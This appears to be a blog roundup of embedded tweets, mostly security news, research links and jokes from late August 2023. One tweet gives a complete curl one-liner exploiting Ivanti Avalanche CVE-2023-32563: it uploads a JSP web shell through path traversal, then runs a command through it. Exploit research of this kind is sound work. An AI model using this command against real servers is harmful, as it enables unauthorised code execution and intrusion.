August 25, 2023
August 25, 2023
... and this is pretty cool!#Ghidralligator is a C++ multi-architecture pcode emulator based on the #Ghidra libsla designed for #fuzzing with AFL++. It allows performing emulation-based fuzzing when dealing with binaries running on exotic architectures.https://t.co/V4RybiNrEC
β raptor@infosec.exchange (@0xdea) August 23, 2023
Is computer hacking a crime (1989)
https://faculty.weber.edu/apainter1/Readings/Hacking%20a%20Crime.pdfπ¨ Wow. Imagine waking up, and your entire company's online presence is erased.
β Matt Johansen (@mattjay) August 24, 2023
Email. Domain. Documents. Databases. Gone
Poof.
Well, that's what happened to customers of two hosting providers this week. π
If I were a renaissance painter manager again, here's a stat I'd track:
β Halvar Flake (@halvarflake) August 25, 2023
Brush strokes on canvas.
Total weight of oil paint delivered on canvas.
I am sure this would help me get more Michelangelo paintings. https://t.co/mEPhxCqVtu
... ... and here is how the Chandrayaan-3 Rover ramped down from the Lander to the Lunar surface. pic.twitter.com/nEU8s1At0W
β ISRO (@isro) August 25, 2023
Meme explainer for #ransomware#cybersecurity #infosec #Memes pic.twitter.com/zTt0nYPYRz
β CyberKnow (@Cyberknow20) August 24, 2023
The Upside of Falling Down: Embracing Failure to be a Better Hacker (and Human) slides are up! Video from @HITBSecConf #HITB2023HKT coming soon. https://t.co/4mpE1oiI2B
β Joe Grand (@joegrand) August 25, 2023
β Dr. Dan Lomas (@Sandbagger_01) August 25, 2023
By accusing two Chinese nationals of spying for the U.S., Chinaβs spymasters are warning citizens abroad to guard against CIA enticement https://t.co/gN1zw6j3Cb via @WSJ
β Dr. Dan Lomas (@Sandbagger_01) August 25, 2023
Ivanti Avalanche CVE-2023-32563:
β wvu (@wvuuuuuuuuuuuuu) August 25, 2023
curl -v http://192.168.56.101:1900/Servlet/Skins -F guid=../../../Web/webapps/ROOT -F "file=@-;filename=x.jsp" <<<'<%Runtime.getRuntime().exec(request.getParameter("c"));%>' -: -k https://192.168.56.101:8443/x.jsp -d c=mspaint.exe
We need more efforts like the ones supporting memory safety, but for securing open-source package repositories.
β Silas // p1nk (@silascutler) August 25, 2023
The @Phylum_IO research team has been putting out some outstanding reporting. https://t.co/SShsKSjKYs pic.twitter.com/UVQUrtu9pL
Weekly analysis is out
β Ollie Whitehouse (@ollieatnowhere) August 25, 2023
-π¨π³ ops in π°π· using π
-π¨π³ ops in ππ° and SE Asia via supply chain
-π°π΅ ops on βΏ get $2bil in 5 years
-π¦ΉββοΈ ops on π using signed code
-π¦Ήπ» ops deploying π‘ geo implants
-π¦Ήπ½ββοΈ ops from πΈπΎ
- βοΈ backdoors
plus the usual tradecraft etc.https://t.co/MS0wJKGyKT
The UK's @NCSC has launched its research problem book - https://t.co/ecDFHB4rp4 cover 5 topics including:
β Ollie Whitehouse (@ollieatnowhere) August 24, 2023
- How can we build systems we can trust?
- How do we make system security assessments more data driven?
etc.https://t.co/uuGWhdazQz < support blog..
This week's SRB is out:
β Tom Uren (@tomatospy) August 25, 2023
- Why Russia's Cyber War Against Ukraine Failed
- Advanced Persistent Teenagers
- The latest open source hippies
Read and subscribe here:https://t.co/zHBs4Vvsmu
Or listen: https://t.co/y5Xy7ztjUM pic.twitter.com/RLlyZfvrFw
We haven't been very public with it yet, but @EricMichaud formally announced at @HITBSecConf Project Keybleed by Unciphered.
β Unciphered LLC (@uncipheredLLC) August 25, 2023
Looking for the haveibeenpwned of cryptowallets, here you go! https://t.co/FQHsJYD9eH
Lady was pissy when I insisted on walking with her to the parking lot, but it was raining and she had an umbrella.
β Forward March (@RunOldMan) September 14, 2020
me: I just want 2 minutes of privacy in the bathroom
β meghan (@deloisivete) January 28, 2022
my kid: best I can do is a paleontology lecture
A little old random fun fact about Exchange that probably not everyone knows. Very often you will see the the following "ou=Exchange Administrative Group\FYDIBOHF23SPDLT" referenced.
β Oddvar Moe (@Oddvarmoe) August 24, 2023
That FYDIBOHF23SPDLT might look random, but it is not. (Caesar's cipher 1 to the left π)
I come from a long line of successful people. I decided to stop that tradition.
β MomofTeen (@MomofTeen) March 14, 2015
Code Llama is here, including first release of a 34B Llama2 model. It is competitive with WizardCoder 15B (better at python, possibly worse at others) and beats GPT-3.5 in both HumanEval and MBPT coding benchmarks. https://t.co/nG7wPX7irw
β Richard Johnson (@richinseattle) August 25, 2023